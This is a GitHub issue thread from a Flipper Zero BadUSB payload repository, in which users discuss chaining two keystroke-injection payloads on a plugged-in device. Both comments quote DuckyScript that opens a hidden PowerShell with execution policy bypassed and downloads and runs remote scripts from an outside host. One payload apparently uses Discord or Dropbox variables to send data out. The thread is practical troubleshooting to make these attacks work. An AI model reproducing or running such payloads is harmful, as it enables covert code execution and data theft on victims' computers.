I-Am-Jakoby / Flipper-Zero-BadUSB

Repository for my flipper zero badUSB payloads. Now almost entirely plug and play.
5.33k stars 675 forks source link

Question : is it possible to run more at once #87

Open ben5446 opened 1 year ago

ben5446 commented 1 year ago

So these script also work on a rubber ducky USB so I was wondering if it was possible to run more at once I've tired to do "GUI r DELAY 500 STRING powershell -w h -NoP -Ep Bypass $dc='';$db='';irm jakoby.lol/9nb | iex ENTER DELAY 500 GUI r DELAY 500 STRING powershell -w h -NoP -Ep Bypass $channel="'youtube.com/iamjakoby'";irm jakoby.lol/wj4 | iex ENTER" But only the last one works both of them run just fine but only the last one gets fully executed so I was wondering if it was possible to do a system where it waits for the first to get done then does the second

ha3ks commented 1 month ago

Have you experiemented with more delay time on the first script? e.g

"GUI r DELAY 500 STRING powershell -w h -NoP -Ep Bypass $dc='';$db='';irm jakoby.lol/9nb | iex ENTER DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -Ep Bypass $channel="'youtube.com/iamjakoby'";irm jakoby.lol/wj4 | iex ENTER"